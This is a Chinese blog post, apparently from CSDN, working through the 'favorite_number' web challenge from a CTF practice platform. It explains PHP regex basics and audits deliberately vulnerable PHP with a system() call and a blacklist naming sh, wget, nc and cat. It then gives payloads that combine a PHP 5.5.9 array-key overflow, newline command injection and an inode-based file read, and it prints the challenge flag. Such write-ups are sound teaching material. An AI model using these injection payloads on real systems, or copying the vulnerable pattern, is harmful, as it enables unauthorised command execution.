攻防世界-favorite_number-(详细操作)做题笔记

最新推荐文章于 2022-07-20 18:09:54 发布
最新推荐文章于 2022-07-20 18:09:54 发布
阅读量1k 收藏 4
点赞数
分类专栏: 攻防世界 web 高手篇 文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43715020/article/details/125386465
版权

如有不对的地方,还请各位大佬指正。下面开始做题:

进入题目以后直接是给了代码,让我们进行代码审计:

$_POST[]

预定义的 $_POST 变量用于收集来自 method="post" 的表单中的值。

从带有 POST 方法的表单发送的信息,对任何人都是不可见的(不会显示在浏览器的地址栏),并且对发送信息的量也没有限制。

PHP正则表达式preg_match函数的使用:

利用 preg_match(),可以完成字符串的规则匹配。如果找到一个匹配,preg_match() 函数返回 1,否则返回 0

正则表达式preg_match的规则:

◆/ 为定界符

◆开头的 ^ 和结尾的 $ 让PHP从字符串开头检查到结尾。


◆[ 和 ] 被用来限制许可输入类型。例如 a-z 允许所有的小写字母,A-Z 允许所有的大写字母,0-9 所有数字,等等,以及更多其他类型。


◆{ 和 } 被用来限制期望的字符数。例如 {2,4} 表示字符串的每一节可以有 2-4 字符长度,像是 .com.cn 或 .info。在这里, "." 并不算一个字符,因为 {2,4} 之前定义的许可输入类型只有大小写字母,故此段只匹配大小写字母


◆( 和 ) 被用来合并小节,并定义字符串中必须存在的字符。(a|b|c) 能够匹配 a 或 b 或 c。


◆(.) 将匹配所有字符,而 [.] 只匹配 "." 本身。
要使用一些符号本身,必须在前增加一个   。 这些字符有:( ) [ ] . * ? + ^ | $

◆定界符,通常使用 “/”做为定界符开始和结束,也可以使用”#”

◆”i”就是修饰符,表示忽略大小写,还有一个我们经常用到的是”x”表示忽略空格

◆ ^  放在字符域(如:[^\w])中表示否定(不包括的意思)——“反向选择”

   ^  放在表达式之前,表示以当前这个字符开始。(/^n/i,表示以n开头)。

◆ *  0到到次

◆ + 1到多次还可以写成{1,}

◆ ? 0或1次

◆  .  匹配除换行符外的所有单个的字符

◆ \w [a-zA-Z0-9]

◆\s  空白字符(空格,换行符,回车符)[\t\n\r]

◆\d  [0-]

  \d是数字 \D是非数字,此处还有\w表示大小写字母、数字、下划线,\W表示跟\w刚好相反

具体请参考php正则表达式入门详解-php教程-PHP中文网

PHP preg_match正则表达式详解_zouhui1的博客-CSDN博客

 <?php
//php5.5.9
$stuff = $_POST["stuff"];  //
$array = ['admin', 'user'];
if($stuff === $array && $stuff[0] != 'admin') { //如果传入的$stuff类型与数值同时都等于$array与$stuff[0]且不等于admin
    $num= $_POST["num"];  
    if (preg_match("/^\d+$/im",$num)){  //匹配$num的数字多次且不区分的大小写
        if (!preg_match("/sh|wget|nc|python|php|perl|\?|flag|}|cat|echo|\*|\^|\]|\\\\|'|\"|\|/i",$num)){   //黑名单
            echo "my favorite num is:";
            system("echo ".$num);
        }else{
            echo 'Bonjour!';
        }
    }
} else {
    highlight_file(__FILE__);
}

代码审计:

第一点:这里的关键函数是:if($stuff === $array && $stuff[0] != 'admin'),变量stuff类型与数值都同时等于$array与$stuff[0]且不等于admin。

第二点:正则表达式,要求$num 全部是数字

第三点:黑名单过滤

第一个条件绕过,PHP5.5.9存在key整数溢出当key=4294967296(2^32)次方可绕过,具体的漏洞文档PHP :: Bug #69892 :: Different arrays compare indentical due to integer key truncation

payload:stuff[4294967296]=admin&stuff[1]=user&num=123

但是需要注意的一点是网页下的包基本都是GET型的数据包,我们需要通过burpsuite自带的改包键进行数据包的改变  ,具体的改包方式如何在Brupsuite中将一个GET数据包修改为POST数据包 - Article_kelp - 博客园

 点击后才能满足数据包的更改,代码审计中的上传方式是用POST方式上传;

 更改后上传构建的payload:

第二步绕过:全数字大小写不敏感,可以利用换行符%0a绕过  具体请参考这里(第三步是黑名单,尝试其他方式获得flag就行)preg_match()绕过的问题总结 - 无据 - 博客园

payload:stuff[4294967296]=admin&stuff[1]=user&num=123%0als -i /

由于flag被第三步过滤掉了,所以直接输入stuff[4294967296]=admin&stuff[1]=user&num=123%0acat  /flag无法查看flag

 

最终的payload:stuff[4294967296]=admin&stuff[1]=user&num=123%0atac `find / -inum  2361104`

 flag:cyberpeace{6e3618f96bf16741eac6105a06507ebf}

 

总结,当要时刻关注版本自带的漏洞。

 

 

 

角一角
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界 web高手进阶区 9分题 favorite_number
闵行小鱼塘
10-29 4226
继续ctf的旅程,开始攻防世界web高手进阶区的9分题,本文是favorite_number的writeup
攻防世界WEB练习-favorite_number
墨鱼菜鸡
09-10 147
目录 题目场景 代码审计及绕过 通过php5.5版本的数组key溢出漏洞进行数组绕过 换行符绕过正则跨行匹配 黑名单绕过 题目场景 <?php //php5.5.9 $stuff=$_POST["stuff"]; $array=['admin','user']; if($stuff===$array&&amp...
攻防世界-favorite_number
qq_44065556的博客
09-29 1566
老样子进入环境,一段代码刷刷下来,闯进脑子里 这里就需要具备php语言的基础了,还有正则的基础,还不会的小伙伴,赶紧补一补 (注意php5.5.9这个版本) 分析一下代码: if($stuff === $array && $stuff[0] != 'admin') //数组判断,强等于,首元素需要不等于 'admin' if (preg_match("/^\d+$/im",$num)) //只允纯数字, 看到谋面的/m了吧,这是开启了多行匹配,所以呢 ^和$不只是字...
攻防世界-favorite number
xixihahawuwu的博客
11-23 1596
一道web题 题目并没有给我们有用的提示信息 进入环境 这个应该是网页的源码 开始代码审计 我们可以很明显的看到一个麻烦的东西 if($stuff === $array && $stuff[0] != ‘admin’) { 这里即要求一个强等于,还要求首元素要不一样 然后是一个正则,还有一个黑名单 第一个应该要从php5.5.9自身的漏洞入手,去查查资料 问题出在php中key数组的溢出 https://segmentfault.com/q/1010000003871264 这个链接是
[攻防世界]favorite_number
snowlyzz的博客
05-07 350
<?php // php5.5.9 // 传参方式是post $stuff = $_POST["stuff"]; // 白名单 $array = ['admin', 'user']; // 既要数组强等于,又要首元素元素不等于 // 即要$stuff === ['admin', 'user'] 又要 $stuff[0]!='admin' if($stuff === $array && $stuff[0] != 'admin') { // 取得另一个post参数 $.
攻防世界Training-Stegano-1
10-31
【标题】"攻防世界Training-Stegano-1" 是一个关于信息安全领域的训练题目,主要涉及的是隐写术(Steganography)技术。隐写术是一种隐藏信息的技术,通常用于在图像、音频或文本中嵌入秘密数据,使得非授权者无法...
网络攻防课程seed-labs实验-DNS_Attacks.zip
06-01
本次"网络攻防课程seed-labs实验-DNS_Attacks.zip"旨在通过实践操作,帮助学生深入理解DNS系统的工作原理以及可能遭受的攻击类型,从而提升网络安全防护意识和技能。 DNS是互联网的基础服务之一,它负责将人类可读...
攻防世界miss-01,杂项misc太湖杯
11-01
标题 "攻防世界miss-01,杂项misc太湖杯" 暗示这是一个网络安全相关的挑战,特别是关于“攻防世界”平台上的一个名为“miss_01”的问题,该问题分类在“杂项”(misc)类别下,可能涉及多种技术技能。描述中提到的...
MS11-046.rar_ms11_ms11-011_visual c
09-21
3. **提权漏洞**:这类漏洞允许攻击者在未授权的情况下获取更高的系统权限,从而执行恶意操作,如安装程序、查看、更改或删除数据,甚至创建新账户。提权漏洞通常是由于程序设计错误或权限管理不当造成的。 4. **源...
网络攻防课程seed-labs实验-Sniffing_Spoofing.zip
最新发布
06-01
《网络攻防课程seed-labs实验-Sniffing_Spoofing.zip》是一个与网络安全相关的实验,主要聚焦在嗅探(Sniffing)和欺骗(Spoofing)这两个关键概念上。这两个技术是网络攻防领域的重要组成部分,理解和掌握它们对于...
攻防世界favorite_number
qq_43774856的博客
12-05 845
favorite_number 打开链接得到源码 <?php //php5.5.9 $stuff = $_POST["stuff"]; $array = ['admin', 'user']; if($stuff === $array && $stuff[0] != 'admin') { $num= $_POST["num"]; if (preg_match("/^\d+$/im",$num)){ if (!preg_match("/sh|wget|nc
CTF攻防世界 favorite_number
weixin_68652890的博客
04-01 2583
1.首先接收一个数组stuff强等于array且stuff[0]不等于admin 2.正则表达多行匹配数字 3.过滤一些关键字 \d匹配数字 +一次或多次匹配 /i 表示匹配的时候不区分大小写 /m 表示多行匹配 所以就是多行匹配只能匹配到数字 (!preg_match("/sh|wget|nc|python|php|perl|?|flag|}|cat|echo|*|^|]|\\|’|"||/i",$num)) 过滤 PHP数组key溢出,简单的说就是stuff[4294967296]表示的值,与s.
日常练习之web(攻防世界favorite_number
doraemon12345的博客
12-01 250
打开题目php代码映入眼帘,看到有提示版本,应该是版本漏洞 是个判断数组强等于,又要首元素不等,然后正则要求整个字符串都是数字 搜寻php5.5.9版本漏洞,有关php数组key溢出,看了大佬们的解释,有点明白,又有点不明白先放payload stuff[4294967296]=admin&stuff[1]=user&num=123 按照询问大佬的解释和网上查阅的资料,我的理解是计算机操作系统是32位的,那它最多的就是[2^31],这里的[4294967296=2 ^32 ]所以就会存在
文件的读写基本操作
热门推荐
范高伦的博客
09-07 1万+
一、文件是计算机中数据持久化存储的表现形式 读写文件标准操作格式1: 1、打开文件:file1 = open('文件名','读写模式') 2、操作文件 3、关闭文件:file1.close() 文件操作完毕后必须关闭,否则长期保持对文件的连接状态,造成内存溢出的现象发生 读写文件操作格式2: # 1、打开文件 file1 = open('demo.txt','w') # 2、操作文件 file1.write('hello world') # 3、关闭文件 file1.close() 1、打开文件:wi
由XCTF-favorite_number引发的PHP 数组问题与URL编码引出的编码问题
weixin_43821278的博客
03-13 261
PHP数组这个ctf题有很多大佬的WP就不写了讨论PHP数组问题(数字索引数组)题目本地模拟 这个ctf题有很多大佬的WP就不写了 第一个比较是数组的强等于 但是由要求两个数组的第一个元素不等 WP的payload stuff[4294967296]=admin&stuff[1]=user&num=123 讨论PHP数组问题(数字索引数组) 实验环境: WINDOWS10,PHPstudy(Apache2.4.39,php5.5.9nts) 在 PHP 中,有三种数组类型: • 索引数组
攻防世界 favorite_number
zgwz123456的博客
02-22 267
打开后发现是一道php代码审计题 1.首先是个判断,既要数组强等,又要首元素不为admin 2.做了一个正则匹配,要求字符串全为数字,大小写不敏感,跨行检测 3.写了一个黑名单,把常用的都排除了 数组判断 这个第一个绕过就让人头疼 想了想他这提示了php5.5.9,那应该是从php5.5.9这个版本的本身漏洞着手 查了查有数组溢出漏洞 参考: PHP的信息安全(入侵获取$flag)的题目【Q2】 PHP数组的key溢出问题 看了其他大佬的wp,发现这个php5.5.9版本的数组溢出值为4294967296.
攻防世界----favorite_number
qq_44418229的博客
07-20 586
攻防世界----favorite_number 知识点1 php5.5.9版本数字溢出漏洞 知识点2 代码执行的绕过技巧
攻防世界favorite_number
qq_46230755的博客
01-19 827
<?php //php5.5.9 $stuff = $_POST["stuff"]; $array = ['admin', 'user']; if($stuff === $array && $stuff[0] != 'admin') { $num= $_POST["num"]; if (preg_match("/^\d+$/im",$num)){ if (!preg_match("/sh|wget|nc|python|php|perl|\?|flag|.
PHP变量的正则,用preg_match()连接正则表达式字符串中的变量 - php
weixin_39820136的博客
03-10 503
我正在使用preg_match()函数来确定是否执行一个函数。if( preg_match( '/^([0-9]+,){0,3}[0-9]+$/', $string ) ) { ... }但是我必须使用整数变量并将其集成到正则表达式中:$integer = 4;if( preg_match( '/^([0-9]+,){0,' . $integer . '}[0-9]+$/', $string ) ...
攻防世界-baby_web详解
12-21
为了详细了解攻防世界-baby_web的攻击和防御方法,我们可以进行以下步骤: 1. 分析源代码:通过查看源代码,我们可以了解应用程序的结构和逻辑,以及可能存在的漏洞点。 2. 注入攻击:尝试使用注入攻击来获取数据库...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值